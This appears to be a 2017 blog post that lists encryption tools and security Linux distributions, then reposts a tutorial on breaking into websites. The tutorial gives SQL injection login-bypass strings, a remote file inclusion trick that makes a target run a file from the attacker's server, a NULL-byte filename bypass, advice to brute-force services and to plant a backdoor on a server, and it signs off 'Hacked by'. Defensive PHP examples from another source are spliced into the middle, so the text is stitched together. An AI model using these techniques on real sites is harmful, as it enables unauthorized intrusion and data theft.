Saturday 28 October 2017

Encryption Tools


Times are changing and spying has become a common phenomenon everywhere. There have been increasing instances where even the governments have been found to be spying on their citizens from time to time. This is one of the prime reasons why the importance of Encryption has increased manifold. Encryption tools are very important because they keep the data safe by encrypting it so that even if someone accesses the data, they can’t get through the data unless they know how to decrypt the data. These tools use algorithm schemes to encode the data to prevent unauthorized access to the encrypted data.

Some of the popular Encryption Tools will be discussed in this article:

TrueCrypt

TrueCrypt is an open source encryption tool which can encrypt a partition in the Windows environment (except Windows 8); it's equipped for creating a virtual encrypted disk in a file. Moreover, it has the capability to encrypt the complete storage device. TrueCrypt can run on different operating systems like Linux, Microsoft Windows, and OSX. TrueCrypt stores the encryption keys in the RAM of the computer.

OpenSSH

OpenSSH is the short name for Open Secure Shell and is a free software suite which is used to make your network connections secured. It uses the SSH protocol to provide encrypted communication sessions in a computer network. It was designed originally as an alternative to the Secure Shell Software developed by SSH Communications Security. The tool was designed as a part of the OpenBSD project.

PuTTY

It is an open source encryption tool available on both UNIX and Windows operating systems. It is a free implementation of SSH (Secure Shell) and Telnet for both Windows as well as UNIX. The beauty of this tool is that it supports many network protocols like Telnet, SCP, rlogin, SSH and raw socket connection. The word PuTTY has no specific meaning; however, as in UNIX tradition, tty is a terminal name.

OpenSSL

OpenSSL is an open source encryption tool which implements the TLS and SSL protocols. OpenSSL’s core library is written in the C programming language. The fundamental cryptographic functions are implemented by it. OpenSSL versions are available for operating systems like UNIX, Solaris, Linux and Mac OS X. The project was undertaken in 1988 with the objective of inventing free encryption tools for the programs being used on the internet.

Tor

Tor is a free encryption tool and has the capability to provide online anonymity as well as censorship resistance. Internal traffic is directed through a free network which consists of more than five thousand relays so that the user’s actual location can be hidden. It is difficult to track the Internet activities like visiting websites and instant messages; the most important goal of this tool is to ensure the personal privacy of the users.

OpenVPN

It is an open source tool for the implementation of virtual private network techniques so that secure site-to-site or point-to-point connections using routers or bridges are possible, also remote access is possible. OpenVPN offers the users a secure authentication process by using secret keys which are pre-shared.

Stunnel

Stunnel is a multi-platform open source tool which is used to ensure that both the clients and the servers get secured encrypted connections. This encryption software can operate on a number of operating system platforms like Windows as well as all operating systems which are UNIX-like. Stunnel depends upon a distinct library like SSLeay or OpenSSL to implement the protocols (SSL or TLS).

KeePass

KeePass is an open source as well as a free password management tool for the Microsoft Windows as well as unofficial ports for operating systems such as iOS, Linux, Android, Mac OS X and Windows Phone. All the usernames, passwords, and all other fields are stored by KeePass in a secured encrypted database. This database, in turn, is protected by a single password.

Intrusion Detection System And The IDS Tools

An Intrusion Detection System is a software application or a device which is equipped to do network or system monitoring activities for any malicious threats and sends reports to the management station. Intrusion detection tools can help in identifying potential threats which can be dangerous for the system or the network.

Snort

It is an open source Network Intrusion System as well as a Network Intrusion Prevention System which is free for all to use. It was created in 1988 by Martin Roesch. It has the capability to perform packet logging and analysis of real-time traffic on networks which are using the internet protocol.

NetCop

NetCop is an advanced intrusion detection system which is available practically everywhere. NetCop makes use of a specific method to classify the spyware. This is because there are several software programs which intrude your privacy and which have a different kind of capabilities. NetCop gives a distinct threat level to each program, thus classifying the threats.

Hacking Operating Systems


There are numerous professionals who aspire to have a career as ethical hackers. Hacking is not an easy task as it requires great insight about technology and programming. There are specific operating systems as well that are specially designed for the hackers to use. These operating systems have preloaded tools and technologies that hackers can utilize to hack. This article offers a detailed overview of various operating systems that are built keeping hacking in mind. All these operating systems are unique from each other and have proved to be a great resource for the hackers around the world.

Backtrack 5r3

This operating system is built keeping the savviest security personnel in mind as the audience. This is also a useful tool even for the early newcomers in the information security field. It offers a quick and easy way to find and also update the largest database available for the security tools collection till date.

Kali Linux

This is a creation of the makers of BackTrack. This is regarded as the most versatile and advanced penetration testing distribution ever created. The documentation of the software is built in an easy format to make it the most user-friendly. It is one of the must-have tools for ethical hackers that is making a buzz in the market.

SELinux

Security Enhanced Linux or SELinux is an upstream repository that is used for various userland tools and libraries. There are various capabilities like policy compilation, policy management and policy development which are incorporated in this utility tool along with SELinux services and utilities. The user can get the software as a tested release or from the development repository.

Knoppix

The website of Knoppix offers a free open source live Linux CD. The CD and DVD that is available contain the latest and recent updated Linux software along with desktop environments. This is one of the best tools for the beginners and includes programs like OpenOffice.org, Mozilla, Konqueror, Apache, MySQL and PHP.

BackBox Linux

It is a Linux distribution that is based on Ubuntu. If you want to perform security assessment and penetration tests, this software is the one that you should have in your repository. It proactively protects the IT infrastructure. It has the capability to simplify the complexity of your IT infrastructure with ease as well.

Pentoo

It is a security-focused live CD that is based on Gentoo. It has a large number of customized tools and kernels, including a hardened kernel with aufs patches. It can also backport the Wi-Fi stack from the latest stable kernel release. There are development tools in Pentoo that have Cuda/OPENCL cracking.

Matriux Krypton

If you are looking for a distro to be used in penetration testing and cyber forensic investigation, then Matriux Krypton is the name that you can trust. This is a Debian based GNU/Linux security distribution. It has more than 340 powerful tools for penetration testing and forensics; additionally, it contains custom kernel 3.9.4.

NodeZero

This is regarded as the specialist tool that is specifically designed for security auditing and penetration testing. It is a reliable, stable and powerful tool to be used for this purpose and is based on the current Ubuntu Linux distribution. It is a free and open source system that you can download from the website.

Blackbuntu

It is a free and open source penetration testing distribution available over the internet. It is based on Ubuntu 10.10 and is designed specifically for information security training students and professionals. It is fast and stable, yet a powerful tool that works perfectly for you. This software is a recommendation from most of the users.

Samurai Web Testing Framework

It is a live Linux environment that is designed in such a way that it functions as a web pen testing environment. The software CD contains tools and programs that are open source and free. The tool selection is based on the ones that the company themselves use for security of their IT infrastructure.

WEAKERTH4N

It's a great pen testing distro comprising some innovative pen testing tools. The software uses Fluxbox and is built using Debian Squeeze. One of its popular features is its ability to hack old Android based systems.

CAINE (Computer Aided Investigative Environment)

It is an Italian GNU/Linux live distribution that was created as a digital forensics project. It offers a complete forensic environment. This environment is organized in such a way that it integrates the existing software tools as software modules and presents the results through a friendly graphical interface.

Bugtraq

It is one of the most stable and comprehensive distributions. It offers stable and optimal functionalities with the stable manager in real-time. It is based upon the 3.2 and 3.4 generic kernels and is available in both 32 and 64 bits. Bugtraq has a wide range of tools in various branches of the kernel. The features of the distribution vary as per your desktop environment.

DEFT

DEFT is a distribution that is created for computer forensics. It can run in a live stream on the system without corrupting the device. The system is based on GNU/Linux and the user can run this live using CD/DVD or USB pen drive. DEFT is now paired with DART, which is a forensic system.

Helix

There are various versions of Helix released by e-fense that are useful for both home and business use. The Helix3 Enterprise is a cyber-security solution offered by this organization that provides an incident response. It throws live response and acquires volatile data. Helix3 Pro is the newest version in the block of Helix family products.

website hacking

Successfully Hack a Website in 2017!

Hello partners, first of all I would like to thank all those who have sent me positive feedback about my posts, and to say that I'm always willing to learn and teach. I'm also open to answering the appropriate questions.
Second, I want to say sorry for the series I left in standby mode; as soon as I get time I will return to them. Lastly, I want to wish a happy new year and happy hacking to you all.

How to Hack a Website?

We all know that hacking is nothing more than the skill of this century.
So what does it mean?
It means that not everyone can get that skill, so you can see how privileged it is to know hacking. On the other hand, it's just like a sport: some are born with the talent, some have to practice a lot to get the necessary skills.

Why to Hack a Website? Are Not We White-Hat?

Even in case you never had a successful hack before, I assume that once you are here you already know the meaning of the pic above (the picture looks a little scary and more like a black-hat attitude). The classification of hackers actually does not make a lot of sense; in my opinion there are newbies, hackers, expert hackers and, even worse, the skids around. Even as a white-hat (according to what the world defines as white-hat), sometimes you will find yourself in situations where you have to bring an a*hole down because they are running non-human websites like child pornography and etc.

OK! So How to Hack a Website?

There are a bunch of tutorials here on null-byte and around the internet on how to hack a website with a specific tool. In case you want to learn, you are in the right place, just look around. But today I want to share something that I think will be very useful for you, so take a cup of coffee, grab your chair and start to read this. What I'm going to show you today is totally different from my other tutorials: instead of showing you how to use these tools, I will guide you on how you can successfully use these tools and tricks to hack any website, based on my experiences.
Below is my list when I want to hack a website.

The Reconnaissance

The reason why a lot of newbies and non-professional hackers fail to get a successful hack is that they don't want to wait. Most of the time they want a magic button they can click and that's all, but in reality it does not work like that. The first thing you have to do is a good reconnaissance of your target. For those familiar with software development it is easier to understand what I mean: you cannot develop good software without good documentation. Just like UML in the software industry, here it is the same: we need info about the target to make our tasks easier.

My Advice on Good Recon

What are the services they are running?
Figure out things like open ports, software and versions on the server, and try to look for an exploit in case there is at least one online, or you can just make your own exploit.
Tools that I recommend for this section are nmap, whatweb and nikto and, of course, some others made by Mr_Nakup3nda or you.
Did they write the script by themselves?
In case they wrote it by themselves, look for scripts that take user input, scan for directory listing, check the source code, and figure out how the website reacts to abnormal inputs. I often use these inputs:
ADMIN' OR 1=1# when it's an admin URL like website/admin/login/
When it's a normal login, just try those traditional SQL injectors like
' OR '1'='1' --
' OR '1'='1' ({
' OR '1'='1' /*
But it does not end here: try to write SQL statements in the inputs, do echo back to you, try to execute a command based on the server OS, figure out how the website filters the inputs and try to bypass the filters.
And in case they used someone else's code, such as a CMS, just grab a copy of it and try to find bugs on your own, or find an exploit if they use an exploitable version of the CMS.

The Evil Google

Sometimes I hack websites simply with the help of some crafted Google searches. As a hacker you must know how to use Google to gather info or hack; in case you do not know, you can see my tutorial on how to use Google to hack.

Changing the Source Code

I bet at this point you already know how to see the source code of a webpage using the right-click trick. Just remember that scripting languages like PHP, Perl, ASP, Python and so on run on the server side, which means you cannot see their code by right-clicking unless it's an open source platform where you can get a copy of it and change the whole code.

Directory Listing

Index browsing can be very useful when trying to find files you normally shouldn't see, like password files, files used to administrate the web page, log files, and any files where information gets stored.
You can also manually check for suspicious URLs like these:
website.com/logs/
website.com/files/
website.com/sql/
website.com/secret/
You can also make tools that will automatically do it for you; tools like DirBuster can be very useful for this task.

My Friend robots.txt

It's very important while hacking to have a look at these files. I won't explain the use of robots.txt (just google it); they often lead us to a lot of paths that the site owners don't want robots to see, and sometimes they are very sensitive paths.

Remote Files Inclusion

File inclusion vulnerability is a type of vulnerability most often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. Below we have a piece of PHP code that opens a file.
<?php
// $file is taken straight from user input, with no validation
if (!($hfile = fopen("$file", "r")))
    echo("error cant open the file: $file<br />\n");
?>
This example opens the file with the name specified in the user input ($file).
That means it opens every file an attacker wants to open and, if allow_url_fopen is ON, even remote files.
Look, for example, at this piece of code:
<?php
include($dir . "/members.php");
?>
Just create a file .members.php on your web server and call the script like this:
dir=http://www.server.com/
It will execute your file on the target server. The important thing is that you have PHP off, or the code will get executed on your server.

NULL Bytes

The name of our community is also a very popular vulnerability in hacking life.
Let's say they have a script that takes the filename that it gets and puts ".txt" on the end. So the programmer tries to make sure that only txt files can be opened.
But what about a filename like this:
phppage.php
It will get to:
phppage.php.txt
So fopen opens phppage.php.txt, or? No! And that is the point. The fopen function stops after ".php", before the NULL byte, and opens only "phppage.php". So every type of file can be opened.
Scripts that allow uploads (but only for a certain file type) are also a potential target for this type of attack.
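
The server-side checks that stop both the remote include and the NULL-byte filename described above from reaching the filesystem, as an added example (not code from the original post; PAGE_DIR, resolve_page() and the page names are hypothetical):

```php
<?php
// Added example, not from the original post. PAGE_DIR and the page names
// are hypothetical; a temp directory stands in for the application's own.
declare(strict_types=1);

define('PAGE_DIR', sys_get_temp_dir() . '/pages_demo');

/** Map a user-supplied page name to a file inside PAGE_DIR, or return null. */
function resolve_page(string $name): ?string
{
    // 1. Reject NUL bytes explicitly so "name\0.txt" never reaches the filesystem.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // 2. Accept only a simple identifier: no slashes, dots or URL schemes,
    //    so "http://..." and "../" inputs fail here.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 3. The server, not the user, supplies the directory and the extension.
    $path = realpath(PAGE_DIR . '/' . $name . '.php');
    $base = realpath(PAGE_DIR);
    // 4. Containment check after symlinks and ".." have been resolved.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample data: one legitimate page file.
is_dir(PAGE_DIR) || mkdir(PAGE_DIR, 0700);
file_put_contents(PAGE_DIR . '/members.php', "<?php echo 'members page';");

// Constructed inputs: one legitimate name, then the cases from the text.
$inputs = [
    'members',                   // legitimate page
    'http://www.server.com/',    // remote include value from the text
    '../members',                // path traversal form
    "members\0.txt",             // NUL-byte filename
    'missing',                   // well-formed, but no such file
];
foreach ($inputs as $in) {
    $label = json_encode($in, JSON_UNESCAPED_SLASHES);
    printf("%-28s => %s\n", $label, resolve_page($in) === null ? 'rejected' : 'allowed');
}
// Defence in depth: keep allow_url_include off in php.ini so include()
// cannot fetch URLs even if a check like this is missed somewhere.
```

Only the return value of resolve_page() should ever be passed to include() or fopen().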

SQL-Injection

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. In my personal experience this is the most popular issue you will find on websites. The problem is that some websites put that info in a database and not all of them filter it.
So when it is echoed back, the JavaScript message is going to be shown.
If they are just logged, the last part should cause an SQL error which might give us a lot of useful info.
You can try the following: website.com/users.php?id=1
and add a ': website.com/users.php?id=1'
If it throws an error, bingo, you are there.
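
Why the quote test above works against concatenated SQL and fails against bound parameters, as an added example (not code from the original post; the table, column and function names are hypothetical, and it assumes the pdo_sqlite extension is available):

```php
<?php
// Added example, not from the original post. Table, column and function names
// are hypothetical; assumes the pdo_sqlite extension is available.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)');
// Constructed sample account.
$db->prepare('INSERT INTO users (name, pw_hash) VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

/** Deliberately vulnerable: the input becomes part of the SQL text. */
function login_concat(PDO $db, string $name, string $pw): bool
{
    $sql = "SELECT COUNT(*) FROM users WHERE name = '$name' AND pw_hash = '$pw'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

/** Hardened: the name is bound as data; the password is verified in PHP. */
function login_prepared(PDO $db, string $name, string $pw): bool
{
    $st = $db->prepare('SELECT pw_hash FROM users WHERE name = :name');
    $st->execute([':name' => $name]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($pw, $hash);
}

/** Hardened lookup for a users.php?id=... style parameter. */
function user_by_id(PDO $db, string $rawId): ?string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                 // "1'" stops here and never reaches SQL
    }
    try {
        $st = $db->prepare('SELECT name FROM users WHERE id = ?');
        $st->execute([$id]);
        $name = $st->fetchColumn();
        return is_string($name) ? $name : null;
    } catch (PDOException $e) {
        error_log($e->getMessage()); // log server-side, show nothing to the client
        return null;
    }
}

$payload = "' OR '1'='1' --";        // login input quoted earlier in the post
$show = fn($v) => var_export($v, true);
printf("concat,   payload: %s\n", $show(login_concat($db, $payload, 'x')));
printf("prepared, payload: %s\n", $show(login_prepared($db, $payload, 'x')));
printf("prepared, real pw: %s\n", $show(login_prepared($db, 'admin', 'correct horse')));
printf("id 1 : %s\n", $show(user_by_id($db, '1')));
printf("id 1': %s\n", $show(user_by_id($db, "1'")));
```

The catch block also covers the error-message check in the text: database errors go to the server log, so the client sees the same response for a malformed id as for an unknown one.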

Cross-Site Request Forgeries (CSRF) And Command Injection

About this type of attack, I also made a tutorial on how you can carry out these attacks.

Exploitable PHP Functions

Code Execution:
require() - reads a file and interprets content as PHP code
include() - reads a file and interprets content as PHP code
eval() - interprets string as PHP code
preg_replace() - if it uses the /e modifier it interprets the replacement string as PHP code
Command Execution:
exec() - executes command + returns last line of its output
passthru() - executes command + returns its output to the remote browser
`` (backticks) - executes command and returns the output in an array
shell_exec() - executes command + returns output as string
system() - executes command + returns its output (much the same as passthru(), but can't handle binary data)
popen() - executes command + connects its output or input stream to a PHP file descriptor
File Disclosure:
fopen() - opens a file and associates it with a PHP file descriptor
readfile() - reads a file and writes its contents directly to the remote browser
file() - reads an entire file into an array
file_get_contents() - reads file into a string

Brute Forcing

Sometimes you will try all the methods mentioned above, but some web sites are really secure and there is no easy way to exploit them.
Often this doesn't stop us from hacking them. They might have open ports running some services such as ftp, telnet and so on; try to brute force it and get the password. Hydra is another amazing tool for this kind of task.

Physical Access

If you have physical access to the server you get everything in your hands; be discreet and leave a backdoor on it and you are done.

Other Kind of Attacks You Can Also Perform Are:

Buffer Overflow
Heap Overflow
Integer Overflow
And the list is long. I just shared what I have in my mind now; you can also add yours in the comments section... see you very soon in the next tutorials.
Hacked by Mr_ANON_HACKTIVIST